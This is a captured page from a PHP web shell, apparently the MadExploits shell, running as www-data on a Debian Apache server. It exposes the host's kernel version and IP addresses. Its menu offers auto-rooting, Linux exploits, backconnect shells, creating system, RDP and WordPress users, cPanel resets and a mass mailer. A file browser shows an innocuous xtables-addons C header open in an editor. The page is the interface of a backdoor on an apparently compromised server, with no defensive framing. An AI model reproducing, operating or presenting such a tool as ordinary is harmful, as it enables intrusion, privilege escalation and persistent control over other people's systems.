Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.147.77.119
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
xtables-addons-2.12 /
extensions /
ACCOUNT /
[ HOME SHELL ]
Name
Size
Permission
Action
Kbuild
70
B
-rw-r--r--
Makefile
25.46
KB
-rw-r--r--
Makefile.am
299
B
-rw-r--r--
Makefile.in
25.27
KB
-rw-r--r--
Mbuild
65
B
-rw-r--r--
VERSION.txt
5
B
-rw-r--r--
iptaccount.8
548
B
-rw-r--r--
iptaccount.c
5.33
KB
-rw-r--r--
libxt_ACCOUNT.c
4.09
KB
-rw-r--r--
libxt_ACCOUNT.man
2.62
KB
-rw-r--r--
libxt_ACCOUNT_cl.c
5.5
KB
-rw-r--r--
libxt_ACCOUNT_cl.h
2
KB
-rw-r--r--
xt_ACCOUNT.c
34.02
KB
-rw-r--r--
xt_ACCOUNT.h
2.5
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : libxt_ACCOUNT_cl.h
/*************************************************************************** * Copyright (C) 2004 by Intra2net AG * * opensource@intra2net.com * * * * This program is free software; you can redistribute it and/or modify * * it under the terms of the GNU Lesser General Public License * * version 2.1 as published by the Free Software Foundation; * * * ***************************************************************************/ #ifndef _xt_ACCOUNT_cl_H #define _xt_ACCOUNT_cl_H #include <xt_ACCOUNT.h> #define LIBXT_ACCOUNT_VERSION "1.3" /* Don't set this below the size of struct ipt_account_handle_sockopt */ #define IPT_ACCOUNT_MIN_BUFSIZE 4096 struct ipt_ACCOUNT_context { int sockfd; struct ipt_acc_handle_sockopt handle; unsigned int data_size; void *data; unsigned int pos; char *error_str; }; #ifdef __cplusplus extern "C" { #endif int ipt_ACCOUNT_init(struct ipt_ACCOUNT_context *ctx); void ipt_ACCOUNT_deinit(struct ipt_ACCOUNT_context *ctx); void ipt_ACCOUNT_free_entries(struct ipt_ACCOUNT_context *ctx); int ipt_ACCOUNT_read_entries(struct ipt_ACCOUNT_context *ctx, const char *table, char dont_flush); struct ipt_acc_handle_ip *ipt_ACCOUNT_get_next_entry( struct ipt_ACCOUNT_context *ctx); /* ipt_ACCOUNT_free_entries is for internal use only function as this library is constructed to be used in a loop -> Don't allocate memory all the time. The data buffer is freed on deinit() */ int ipt_ACCOUNT_get_handle_usage(struct ipt_ACCOUNT_context *ctx); int ipt_ACCOUNT_free_all_handles(struct ipt_ACCOUNT_context *ctx); int ipt_ACCOUNT_get_table_names(struct ipt_ACCOUNT_context *ctx); const char *ipt_ACCOUNT_get_next_name(struct ipt_ACCOUNT_context *ctx); #ifdef __cplusplus } #endif #endif
Close